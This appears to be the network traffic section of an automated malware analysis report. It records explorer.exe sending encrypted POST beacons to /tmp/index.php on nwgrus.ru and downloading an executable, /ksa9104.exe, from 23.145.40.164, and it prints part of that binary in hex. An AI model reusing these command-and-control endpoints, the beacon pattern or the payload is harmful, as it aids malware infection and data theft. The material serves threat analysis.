                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 180
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:15:04.742368937 CEST180OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 7d 54 d0 a8
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu}TUBqI<5k_yzc|!XBGI-6MM,pF8X4g
                                                                                                                                      Oct 8, 2024 03:15:06.121746063 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:05 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      31192.168.2.449841180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:15:06.130975008 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://gshbntjmlxbreay.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 304
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:15:06.130975008 CEST304OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 58 07 a4 f6
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuXJ2mSD+Cg0Z(W)2nO+~dQ-2o&$ tjJbDuK1";=V3qnrzFyqs<&W1
                                                                                                                                      Oct 8, 2024 03:15:07.506372929 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:07 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      32192.168.2.450056180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:16:15.953778028 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://mqkcxjfgdkafebli.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 290
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:16:15.953795910 CEST290OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 22 ba 9b
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu:"BtuP",'a+?CGI#73)fS^Oy5uJ_i~'#!eL6B`:l\'HS"Wn8KH%!
                                                                                                                                      Oct 8, 2024 03:16:17.332349062 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:16:17 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      33192.168.2.450057180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:16:23.850915909 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://pvrcqmbcktsc.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 236
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:16:23.851033926 CEST236OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 46 c3 fc
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vubF~PbLhq?SEP"\S4;^ H0!m_CiE"%R-K\nJ_%YvzPF(iw"~`Ux
                                                                                                                                      Oct 8, 2024 03:16:25.215214968 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:16:24 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      34192.168.2.450058180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:16:33.780054092 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://gvwiwavaujycn.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 306
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:16:33.780088902 CEST306OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 0f b6 86
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu}MF_I ~f3+yfF7byd'pE9TJ-Q,^DA[Z,0ds^#UD{,UYYe0~)KK{
                                                                                                                                      Oct 8, 2024 03:16:35.175225973 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:16:34 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      35192.168.2.450059180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:16:46.162148952 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://anqkqcglkprylr.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 347
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:16:46.162180901 CEST347OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 14 d1 a0
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vuedwdKm'V!CbU`CM#&jUR>WUA&+CYm'aYWC?-se;:kHT e!Iu
                                                                                                                                      Oct 8, 2024 03:16:47.542952061 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:16:47 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      36192.168.2.450062201.103.8.135802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:17:01.167900085 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://lbnjhrckmixdmp.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 230
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:17:01.167931080 CEST230OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 33 ef a6
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu$3G'MI?PU)/%'M|,nVdz36c%'D<[CWD7`U$182gfnk7[
                                                                                                                                      Oct 8, 2024 03:17:02.271806002 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:02 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      37192.168.2.450064201.103.8.135802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:17:19.598702908 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://jwckdfwbqxcvipv.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 328
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:17:19.598714113 CEST328OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 1b b6 e8
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vuf}zIkqr/M~ajafE'0'8T=$QTg-,!M_5sng[F4(6cxc1rG}>,<s
                                                                                                                                      Oct 8, 2024 03:17:20.703741074 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:20 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      38192.168.2.450066201.103.8.135802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:17:37.710000992 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://qeoeefjxuhhhbrbu.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 331
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:17:37.710035086 CEST331OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 05 f3 ff
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu=sA|vLjfzy9U"yQ?>xL<ZG\8B>4q[T5^UqQ4NjH%oZzpJ>{u`$b
                                                                                                                                      Oct 8, 2024 03:17:38.839585066 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:38 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      39192.168.2.450068201.103.8.135802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:17:55.126094103 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://xxxghskpkjdphcpk.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 259
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:17:55.126184940 CEST259OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2a 2f a4 e3
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vu*/6AsXg!~Ufa&r7U)@2Yj+A(g&P.kpEL~Il.XC3Yp%)X~`2Wla.c\l
                                                                                                                                      Oct 8, 2024 03:17:56.256889105 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:17:56 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                      Data Ascii: r


                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.44976223.145.40.1644432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:14:55 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: 23.145.40.164
                                                                                                                                      2024-10-08 01:14:55 UTC327INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:55 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Last-Modified: Tue, 08 Oct 2024 01:00:02 GMT
                                                                                                                                      ETag: "6ec00-623eca8482fba"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Content-Length: 453632
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                      2024-10-08 01:14:55 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fb 69 6f f7 bf 08 01 a4 bf 08 01 a4 bf 08 01 a4 d0 7e 9f a4 a7 08 01 a4 d0 7e aa a4 98 08 01 a4 d0 7e ab a4 d3 08 01 a4 b6 70 92 a4 b4 08 01 a4 bf 08 00 a4 33 08 01 a4 d0 7e ae a4 be 08 01 a4 d0 7e 9b a4 be 08 01 a4 d0 7e 9c a4 be 08 01 a4 52 69 63 68 bf 08 01 a4 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c0 24 02 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 d6 00
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$io~~~p3~~~RichPEL$e
                                                                                                                                      2024-10-08 01:14:55 UTC8000INData Raw: 95 c0 2a 40 00 8b ff d0 2a 40 00 d8 2a 40 00 e4 2a 40 00 f8 2a 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 5c 2c 40 00 8b ff f7 d9 ff 24 8d 0c 2c 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 60 2b 40 00 ff 24 8d 5c 2c 40 00 90 70 2b 40 00 94 2b 40 00 bc 2b 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 5c 2c 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 5c
                                                                                                                                      Data Ascii: *@*@*@*@*@E^_E^_FGE^_IFGFGE^_t1|9u$r$\,@$,@Ir+$`+@$\,@p+@+@+@F#Gr$\,@IF#GFGr$\
                                                                                                                                      2024-10-08 01:14:55 UTC8000INData Raw: 8d 38 fd ff ff 02 e8 53 43 00 00 e8 03 00 00 00 5b c9 c3 80 a5 38 fd ff ff fe 83 3d f0 1d 45 00 00 75 4f dd 95 30 fd ff ff 8a 85 70 ff ff ff 0a c0 74 1a 3c ff 74 5b 3c fe 74 3f 0a c0 74 33 0f be c0 89 85 72 ff ff ff e9 b2 00 00 00 66 8b 85 5c ff ff ff 66 83 e0 20 75 18 9b df e0 66 83 e0 20 74 0f c7 85 72 ff ff ff 08 00 00 00 e9 8d 00 00 00 d9 ad 5c ff ff ff 9b c3 66 8b 85 36 fd ff ff 66 25 f0 7f 66 0b c0 74 1b 66 3d f0 7f 74 43 eb bb 66 8b 85 36 fd ff ff 66 25 f0 7f 66 3d f0 7f 74 30 eb a8 c7 85 72 ff ff ff 04 00 00 00 dd 05 18 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d 08 fd 40 00 9b df e0 9e 73 34 dc 0d 28 fd 40 00 eb 2c c7 85 72 ff ff ff 03 00 00 00 dd 05 10 fd 40 00 d9 c9 d9 fd dd d9 d9 c0 d9 e1 dc 1d 00 fd 40 00 9b df e0 9e 76 06 dc 0d 20 fd 40 00
                                                                                                                                      Data Ascii: 8SC[8=EuO0pt<t[<t?t3rf\f uf tr\f6f%ftf=tCf6f%f=t0r@@s4(@,r@@v @
                                                                                                                                      2024-10-08 01:14:55 UTC8000INData Raw: 66 83 f9 09 75 bc 85 f6 74 06 33 c9 66 89 4e fe 83 65 fc 00 33 d2 66 39 10 0f 84 c5 00 00 00 0f b7 08 83 f9 20 74 05 83 f9 09 75 0a 83 c0 02 eb ee 83 e8 02 eb da 66 39 10 0f 84 a5 00 00 00 39 55 08 74 09 8b 4d 08 83 45 08 04 89 31 ff 07 33 ff 47 33 d2 eb 04 83 c0 02 42 66 83 38 5c 74 f6 66 83 38 22 75 38 f6 c2 01 75 1f 83 7d fc 00 74 0c 66 83 78 02 22 75 05 83 c0 02 eb 0d 33 c9 33 ff 39 4d fc 0f 94 c1 89 4d fc d1 ea eb 10 4a 85 f6 74 09 6a 5c 59 66 89 0e 83 c6 02 ff 03 85 d2 75 ec 0f b7 08 66 85 c9 74 24 39 55 fc 75 0a 83 f9 20 74 1a 83 f9 09 74 15 85 ff 74 0c 85 f6 74 06 66 89 0e 83 c6 02 ff 03 83 c0 02 eb 81 85 f6 74 08 33 c9 66 89 0e 83 c6 02 ff 03 8b 7d 0c e9 30 ff ff ff 8b 45 08 3b c2 74 02 89 10 ff 07 5f 5e c9 c3 8b ff 55 8b ec 51 51 53 56 57 68 04
                                                                                                                                      Data Ascii: fut3fNe3f9 tuf99UtME13G3Bf8\tf8"u8u}tfx"u339MMJtj\Yfuft$9Uu ttttft3f}0E;t_^UQQSVWh
                                                                                                                                      2024-10-08 01:14:55 UTC8000INData Raw: 45 e4 3d 01 01 00 00 7d 0d 8a 4c 18 1c 88 88 18 bd 44 00 40 eb e9 33 c0 89 45 e4 3d 00 01 00 00 7d 10 8a 8c 18 1d 01 00 00 88 88 20 be 44 00 40 eb e6 ff 35 20 bf 44 00 ff 15 1c f0 40 00 85 c0 75 13 a1 20 bf 44 00 3d f8 ba 44 00 74 07 50 e8 d4 a8 ff ff 59 89 1d 20 bf 44 00 53 ff d7 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 30 6a 0d e8 2d d3 ff ff 59 c3 eb 25 83 f8 ff 75 20 81 fb f8 ba 44 00 74 07 53 e8 9e a8 ff ff 59 e8 9c c4 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 78 cf ff ff c3 83 3d b8 cc 45 00 00 75 12 6a fd e8 56 fe ff ff 59 c7 05 b8 cc 45 00 01 00 00 00 33 c0 c3 cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 83 c9 ff 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01
                                                                                                                                      Data Ascii: E=}LD@3E=} D@5 D@u D=DtPY DSE0j-Y%u DtSYeEx=EujVYE3UV3PPPPPPPPUIt$uIt
